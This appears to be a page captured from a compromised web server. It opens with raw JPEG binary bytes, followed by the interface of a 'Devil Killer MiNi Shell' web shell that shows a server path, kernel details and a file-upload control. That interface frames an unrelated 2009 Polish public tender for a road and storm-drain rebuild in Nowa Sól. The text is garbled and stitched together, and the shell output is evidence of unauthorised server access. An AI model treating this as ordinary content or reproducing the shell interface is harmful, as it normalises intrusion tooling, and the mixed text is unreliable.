JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090602/175908-N-2009.html

<p class="kh_header"><b>Nowa Sól: Przebudowa drogi powiatowej nr 3438 F ulicy M.C. Skłodowskiej od skrzyżowania z ulicą Sienkiewicza do skrzyżowania z ulicą Kaczkowskiego od km 0+00,00 do km 0+389,00  wraz z budową kanalizacji deszczowej w  miejscowości Nowa  Sól</b><br>
<b>Numer ogłoszenia: 175908 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosolski , ul. Moniuszki 3B, 67-100 Nowa Sól, woj. lubuskie, tel. 068 4586800, faks 068 4586831.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej nr 3438 F ulicy M.C. Skłodowskiej od skrzyżowania z ulicą Sienkiewicza do skrzyżowania z ulicą Kaczkowskiego od km 0+00,00 do km 0+389,00  wraz z budową kanalizacji deszczowej w  miejscowości Nowa  Sól.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Opis ogólny przedmiotu zamówienia.

Przedmiotem zamówienia jest wykonanie przedmiotu zamówienia pn. :Przebudowa drogi powiatowej nr 3438 F ulicy M. C.
Skłodowskiej od skrzyżowania z ulicą Sienkiewicza do skrzyżowania z ulicą Kaczkowskiego od km 0+00,00 do km 0+389,00 wraz z
budową kanalizacji deszczowej w miejscowości Nowa Sól. Zadanie jest finansowane ze środków budżetu Powiatu Nowosolskiego. 

1.1.	Zadanie obejmować będzie swym zakresem przebudowę odcinka istniejącej ulicy M. C. Skłodowskiej w Nowej Soli. Odcinek podlegający przebudowie jest drogą nie urządzoną, która posiada obecnie nawierzchnię gruntową bez wydzielonej jezdni , chodnika  i polegać  będzie  w szczególności na następujących działaniach:
a)	wykonanie robot zimnych:
- wykonanie wykopów w  drodze  pod kanalizację deszczową  
- wykonanie koryta pod jezdnie  -  28 cm 
- wykonanie koryta pod zjazdy  - 28 cm 
- wykonanie koryta pod chodnik najazdowy - 28  cm
 
b)	wykonanie warstw podbudowy:
-  pod nawierzchnię jezdni i chodników najazdowych z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/31,5 mm grubości 20 cm 
-  pod nawierzchnię zjazdów i miejsc postojowych z kruszywa łamanego stabilizowanego  mechanicznie o uziarnieniu 0/31,5 mm grubości 15 cm 

c)	wykonanie nawierzchni i ich elementów:
- nawierzchni jezdni  ulicy  z  kostki betonowej  szarej grubości 8 cm, o wymiarach 16 x 16 cm,    ostrokrawędziowej, klasa 50, gat. I, wibroprasowana, na podsypce paskowo cementowej grubości 3cm 
- nawierzchni chodników  z  kostki betonowej szarej  grubości 8 cm, typu  Holland , krawędzie fazowane, klasa 50,  gat. I, 
  wibroprasowana  na podsypce piaskowej  
- nawierzchni chodników  najazdowych , miejsc postojowych  i zjazdów z  kostki betonowej szarej 
  grubości 8 cm, typu  Holland , krawędzie fazowane, klasa 50,  gat. I, wibroprasowana  na podsypce piaskowej  
- wbudowanie ścieku przykrawężnikowego  z kostki betonowej 16 x 16   
- wbudowanie krawężników betonowych  15 x 30  na ławie betonowej z oporem z betonu B 15 
- wbudowanie obrzeży chodnikowych 8 x 30 
- w razie większych różnic poziomów na granicy pasa drogowego stosować zamiast obrzeży kątowniki oporowe z prefabrykatów 
d)	wykonanie regulacji elementów urządzeń podziemnych,
e)	wykonanie sieci kanalizacji deszczowej w ulicy, miedzy innymi: 
- montaż rur PPE o średnicy od 160 mm do  400 mm 
- montaż  studni rewizyjnych 
- montaż wpustów ulicznych 
- montaż separatora 
f)	likwidacja kolizji sieci elektroenergetycznej 
- przebudowa linii kablowej SN 20kV 
- przebudowa linii kablowej nn 0,4 kV 
- przestawienie dwóch latarni oświetlenia drogowego 
g)	wykonaniu oznakowania pionowego zgodnie z przyjętymi rozwiązaniami 

1.2.	Charakterystyka podstawowych elementów przedmiotu zamówienia.
1.2.1.	Konstrukcja jezdni - warstwa ścieralna z kostki betonowej  szarej grubości 8 cm, o wymiarach 16 x 16 cm, ostrokrawędziowej, klasa 50, gat. I, wibroprasowana na podsypce piaskowo -  cementowej  grubości 3 cm  układanej diagonalnie z zastosowaniem infuł przy krawędziach jezdni, podbudowa zasadnicza grubości 20 cm z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/31,5 mm, wg normy PN-S-06102:1996, ściek przykrawężnikowy dwurzędowy z kostki betonowej  szarej 16 x 16  grubości 8 cm na podsypce cementowo - piaskowej i lawie betonowej z betonu B - 15 grubości  20 cm;

1.2.2.	Konstrukcja  zjazdów : 
a)	warstwa ścieralna z kostki  betonowej , brązowej  grubości 8cm  typu   Holland, krawędzie  fazowane, 
               	klasa 50,  gat. I, wibroprasowana  na podsypce  paskowo - cementowej  grubości 3 cm z wypełnieniem spoin                
               	piaskiem,
b)	podbudowy zasadnicza grubości 15 cm z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/31,5 mm, wg normy PN-S-06102:1996, 


1.2.3.	Konstrukcja  miejsc postojowych   
a)	warstwa ścieralna z kostki  betonowej , brązowej  grubości 8cm  typu  Holland, krawędzie  fazowane, klasa 50,  gat. I, wibroprasowana  na podsypce  paskowo - cementowej  grubości 3 cm z wypełnieniem spoin piaskiem,
b)	podbudowy zasadnicza grubości 15 cm z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/31,5 mm, wg normy PN-S-06102:1996, 

c)	
1.2.4.	Konstrukcja  chodników :
a)	najazdowy  - nawierzchnia  chodników z kostki  betonowej szarej grubości 8 cm, typu Holland, krawędzie fazowane, klasa 50,  gat. I, wibroprasowana  na podsypce piaskowo  - cementowej grubości 3 cm,  podbudowa zasadnicza grubości 20 cm z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/31,5 mm, wg  normy PN-S-06102:1996, 

b)	tylko dla ruchu pieszego -  nawierzchnia  chodników z kostki  betonowej szarej grubości 8 cm, typu Holland, krawędzie fazowane, klasa 50,  gat. I, wibroprasowana  na podsypce piaskowej grubości 5 cm  wypełnienie  spoin piaskiem.

1.2.5.	Nawierzchnia obróbek : studni, skrzynek urządzeń podziemnych, obróbek słupów energetycznych i oświetleniowych , słupków znaków drogowych , pasów wyrównawczych nawierzchni chodnika (wzdłuż ścian budynków, cokołów, obrzeży ):
a)	kostka granitowa gr. 4/6 cm i 9/11 cm,
b)	podsypka cementowo - piaskowa  

1.2.6.	Regulacja urządzeń sieci wodociągowo - kanalizacyjnej i gazowej - należy dokonać regulacji wysokościowej skrzynek zaworów oraz włazów kanałowych pokryw studni.

1.2.7.	Odwodnienie  ulicy - kanalizacja deszczowa:
Projektuje się nową sieć kanalizacji deszczowej na projektowanym odcinku drogi, do której podłącza się nowe wpusty deszczowe. Projektowane ukształtowanie niwelety drogi determinuje wykonanie trzech niezależnych odcinków kolektorów deszczowych. Pierwszy będzie odprowadzał wodę do istniejącej sieci kanalizacji deszczowej w ulicy Sienkiewicza , drugi do istniejącej sieci kanalizacji deszczowej w pasie drogowym ulicy Chopina i trzeci odcinek do projektowanej sieci kanalizacji deszczowej w pasie drogowym ulicy Kaczkowskiego.   
Sieć kanalizacyjną stanowi:
a)	kolektor deszczowy wykonany z rur 
b)	przykanaliki i wpusty deszczowe 
c)	studzienki rewizyjne 
d)	studzienki wpustów deszczowych 
e)	separator koalescenyjny
 

1.2.8.	Przebudowa sieci elektroenergetycznych 
W związku z przebudową  ul. m. C. Skłodowskiej, planuje się likwidacje kolizji istniejącej sieci elektroenergetycznej i przestawienie dwóch słupów oświetlenia drogowego. W zakres likwidacji kolizji przewiduje się:
- przestawienie słupów oświetleniowych  w obrębie skrzyżowania ulicy M. C.  Skłodowskiej  z ulicą Chopina w ilości 2 szt.      
- przełożenie i ułożenie   nowych odcinków linii kablowych nn 0,4kV
- przełożenie i ułożenie  nowych odcinków linii kablowych  SN 20 kV 
- ułożenie osłon dzielnych na kablach elektroenergetycznych SN i nn 


1.2.9.	Oznakowanie pionowe zaprojektowano: 
a)	na słupkach stalowych z rur ocynkowanych prostych oraz na słupkach z odgiętymi dwoma odcinkami o długości 1,0 m
b)	tarcze znaków z blachy ocynkowanej z podwójnym zagięciem krawędzi na całym obwodzie z folii I lub II generacji w 
                zależności od rodzaju znaku


1.2.10.	Drzewa i Krzewy - zaprojektowano na wyspach (uspokojenia ruchu oraz środkowej) nasadzenie krzewów ozdobnych w ilości  
110 szt.


1.3.	Charakterystyka podstawowych materiałów.

1.3.1.	Podbudowa pomocnicza -  kruszywo łamane stabilizowane mechanicznie o uziarnieniu 0/31,5 mm wg normy.

1.3.2.	Krawężnik betonowy 
a) typ uliczny szerokość 15 cm 
b) materiał: beton wibroprasowany  klasy B - 35 
c) rodzaje:
prostokątne ścięte 15 x 30 cm, 
    	prostokątne wjazdowe 15 x 22 cm,
    	skośne lewe i prawe 
d) gatunek 1, 
e) dokumenty odniesienia : normy  PN - EN 1340: 2004 

1.3.2.	Obrzeża chodnikowe : 
a)  typ uliczny 100 x 30 x 8 cm 
b) materiał: beton wibroprasowany klasy B -35
c) gatunek 1 
d) dokumenty odniesienia: normy BN-80/6775-03/01 i BN- 80/6775-03/04   

1.3.4.	Kostka kamienna:
a)	kostka granitowa, szara, nieregularna (uzupełniająca obróbki)
            	grubość - 8/11 cm,
            	klasa - I,
            	gatunek - 2,



	b)	kostka granitowa, szara, nieregularna (uzupełnienia, obróbki)
            	grubość - 4/6 cm,
            	klasa - I,
            	gatunek - 2,

1.3.5.	Kostka brukowa betonowa:
a)	wzór:   jezdnia  - kwadrat 16x16 cm, ostrokrawędziowa i infułami, kolor  szary - jezdnia 
b)	wzór:  chodnik, miejsca postojowe,  zjazdy typ Holland 10x 20 krawędzie fazowane:
            	kolor  brązowy  -  zjazdy,
            	kolor  czarny   -  chodnik, chodnik najazdowy, miejsca postojowe,
c)	grubość - 8 cm,
d)	klasa wytrzymałościowa - 50,
e)	gatunek - I,
f)	metoda wytwarzania - wibroprasowanie,
g)	wymagania jakościowe:
            	wygląd zewnętrzny: powierzchnie kostki powinny być pozbawione rys, pęknięć i ubytków betonu; krawędzie elementów 
                powinny być równe i proste: tekstura i kolor powierzchni licowej powinny być jednorodne; wytrzymałość na ściskanie nie 
                mniejsza niż 50 MPa:
mrozoodporność: po 30 cyklach zamrażania i rozmrażania próbek w 3 % roztworze NaCl lub po 150 cyklach 
                zamrażania i rozmrażania w wodzie powinny być spełnione następujące warunki:
                -	próbki nie powinny wykazywać pęknięć i zarysowań powierzchni licowych,
-	łączna, końcowa masa ubytków betonu próbek zamrażanych nie powinna przekraczać 5 %masy próbek nie zamrożonych,
-	końcowe obniżenie wytrzymałości na ściskanie próbek zamrażanych nie powinno być większe niż 20 %,
nasiąkliwość: nie powinna przekraczać 5 %,
ścieralność: nie powinna przekraczać 3,50 mm,
szorstkość: wskaźnik szorstkości SRT powierzchni licowej, sprawdzony wahadłem angielskim powinien wynosić nie mniej niż 50
h)	aprobata techniczna: producent betonowej kostki brukowej powinien posiadać aktualną aprobatę techniczną,
	i)	deklaracja zgodności: dla każdej dostarczonej i wbudowanej partii kostki Wykonawca przekaże zamawiającemu 
                deklarację zgodności producenta kostki.


1.3.6.	Oznakowanie pionowe:
a)	tarcze znaków i tablic należy wykonać z  blachy ocynkowanej ogniowo grubości min. 1,5  mm
	b)	tyły znaków powinny być zabezpieczone farbą  w kolorze szarym nie powodującą refleksów świetlnych,
	c)	przed  naniesieniem powłoki lakierniczej podkłady tarcz znaków powinny być dodatkowo  zabezpieczone warstwą 
                antykorozyjną, 
	d)	wymagane jest malowanie proszkowe tarcz i tablic,
e)	krawędzie tarcz znaków winny być usztywnione na pełnym obwodzie poprzez ich podwójne zagięcie w sposób ciągły,
f)	nie dopuszcza się takich mocowań tarcz, w  których następowałoby jakiekolwiek przewiercanie powierzchni tarcz na wylot,
g)	uchwyty do mocowania tarcz znaków i tablic należy wykonać z blach stalowych o grubości min. 4 mm zabezpieczonych antykorozyjnie metodą cynkowania ogniowego wg normy PN-93/ E-04500,
h)	elementy złączne powinny być zabezpieczone antykorozyjnie poprzez cynkowanie,
i)	tarcze znaków powinny mieć oznaczenia pozwalające na identyfikację producenta i daty produkcji,
j)	do wykonania znaków należy użyć folii odblaskowej posiadającej trwałe cechy identyfikujące producenta folii oraz rok produkcji,
k)	do wykonania znaków należy użyć folii odblaskowej:
-dla znaków typu A-7; D-6; D-6a; D-6b; B-20 i B-2 - folii II generacji ,
-dla pozostałych znaków - folii I generacji,
l)	rozmiary znaków - grupa znaków średnich:
- typ A - 900 mm
- typ B i C - 800 mm,
-typ D - 600 mm
ł)	słupki do mocowania znaków:
-	materiał - rura ocynkowana o średnicy  2 c
-	przewidziane są rury proste oraz z odgiętym dwoma odcinkami o długości 1,0 m (ramionami), odgięcie należy wykonać na zginarce do rur,
-	głębokość posadowienia rury - 80 cm poniżej poziomu terenu z zabezpieczeniem przeciwko obracaniu się,
-	każdy słupek należy zakończyć korkiem z tworzywa sztucznego,
-	zamocowanie słupków - w cokole betonowym z betonu B - 10 o wymiarach 30 x 30 x 100 cm, wykonanym bezpośrednio w gruncie.


1.3.7.	Kolektory deszczowe   zaprojektowano z rur o sztywności obwodowej SN 8 kN/m2 i średnicach  od 160 mm do  250 mm  o połączeniach kielichowych uszczelnionych uszczelką gumową 
albo z rur strukturalnych dwuściennych z polipropylenu z wewnętrzną ścianką gładką i zewnętrzną profilowaną
albo z rur PVC - U o rdzeniu litym w zależności od wyboru wykonawcy. Nie wolno stosować rurociągów z rdzeniem spienionym.
1.3.8.	Studnie  rewizyjne  -zaprojektowano  z kręgów  żelbetowych  z betonu B 40 o  średnicy 1000 mm i 1200 prefabrykowanym  z elementem dennym z betonu B45 łączonych na uszczelki z przykryciem komory płytą  nad studzienną  z otworem śr. 625 w wersji do zabudowy w  jezdni ,wyposażone we włazy typu ciężkiego  z  zawiasem i wkładką tłumiąca klasy D 400.


1.3.9.	Studnie  inspekcyjne  ze względu na zbliżenie do sieci gazowej  zaprojektowano dwie studnie z rury karbowanej DN - 425  i DN 600  jako niewłazowe, wyposażone we włazy typu ciężkiego  z  zawiasem i wkładką tłumiąca klasy D 400 oraz pierścieniem obciążającym.
   
1.3.10.	Przykanaliki  zaprojektowano z rur o sztywności obwodowej SN 8 kN/m2 i średnicy 160 mm z:
                a)	rur PVC - U o rdzeniu litym,
b)	z rur strukturalnych dwuściennych z polipropylenu z wewnętrzną ścianką gładką i zewnętrzną profilowaną albo z rur 
PVC - U o   rdzeniu litym (wybór wykonawcy),

1.3.11.	Studzienki wpustów ulicznych  zaprojektowano jako studzienki kanalizacyjne systemowe WAVIN o średnicy 600 mm  zamknięte rurą teleskopową z wpustem ulicznym D 400  na zawiasie z wiaderkiem osadnikowym.

1.3.12.	Separator  zaprojektowano jako  koalescencyjny  Coalister - CCB - BYPAS  z  przelewem  wewnętrznym NG 8/80 zintegrowany z komorą osadnikową. Przepływ max 80 dm3 /s osadnik o poj. 1600 dm3, pojemność gromadzenia benzyn 129 dm3   zaopatrzony w krócice do poboru próbek lub równoważny.

1.3.13.	Krzewy - nasadzenie 26 szt krzewów ozdobnych na  dwóch wyspach uspokojenia ruchu  wg. projektu Zamawiającego: 
              	a)	Żywotnik wschodni - 1 szt, 
b)	Modrzew Europejski - 1 szt,
c)	Ognik szkarłatny - 4 szt , 
d)	Berberys Thunbergia - 4 szt,
e)	Jałowiec Sabiński - 4 szt, 
m)	Jurga Szwedzka  - 2 szt, 
n)	Pięciornik Krzewiasty - 4 szt, 
o)	Trzmielina Fortunea  - 4 szt, 
p)	Jałowiec Łuskowy  - 2 szt. 


1.4.	Rodzaj i ilość robót
	Rodzaj i ilość robót zaprojektowanych do wykonania przedmiotu zamówienia zostały podane w tabeli przedmiaru robót - poz. 3.

1.5.	Uwagi
1.5.1.	Zakres robót i elementów do wykonania przez wykonawcę określony jest w tabeli przedmiaru robót - poz. 3.
1.5.2.	Wartość zaprojektowanych przez zamawiającego robót należy określić na podstawie Formularza kosztorysu ofertowego - rozdział V SIWZ.
1.5.3.	Zamawiający założył, że wykonawca wykona przedmiot zamówienia z materiałów własnych.

1.5.4.	Zawarte w opisie przedmiotu zamówienia nazwy własne urządzeń, elementów, materiałów należy traktować jako przybliżenie ułatwiające ich dobór przez wykonawcę.
Wykonawca może zaoferować urządzenia, elementy, materiały równoważne spełniające parametry, warunki określone w opisie i dokumentacji projektowej oraz posiadające wymagane aprobaty i certyfikaty..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.32.52-0, 45.23.31.61-5, 45.23.21.30-2, 45.23.14.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wymagania dotyczące wadium: 
Kwotę wadium ustala się w wysokości 40 000,00 PLN (słownie: czterdzieści tysięcy złotych).
1.1.Wadium wnosi się przed upływem terminu składania ofert.
1.2.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-	gwarancjach bankowych;
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b, ust. 5, pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm),

1.3.	Dowód wniesienia wadium  - należy załączyć do oferty w formie oryginału.
1.4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy nr: 
89 203000451110000000284750 - Starostwo Powiatowe w Nowej Soli, ul. Moniuszki 3 b, 67-100 Nowa Sól.
1.5.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
1.6.	W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców każdy z nich może złożyć wadium o takiej wartości by ich suma wynosiła 40 000,00 PLN.

uwaga: w tytule przelewu proszę wpisać, czego dotyczy wadium (przetarg PN 11/2009/PZD)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	W  przetargu  mogą  wziąć  udział  Wykonawcy,  którzy: 
a.	nie podlegają wykluczeniu z postępowania na podstawie art. 24, ust. 1 i 2 Prawa zamówień publicznych 
b.	spełniają  warunki  określone  w  art. 22 ust. 1 Prawa zamówień  publicznych 
c.	spełniają dodatkowe warunki szczególne określone w punkcie 8.5. instrukcji,




2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
a.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

3.	Z postępowania o udzielenie zamówienia wyklucza się:
a.	wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania;
b.	wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego; 
c.	wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
d.	osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 
e.	spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 
f.	spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 
g.	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 
h.	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 
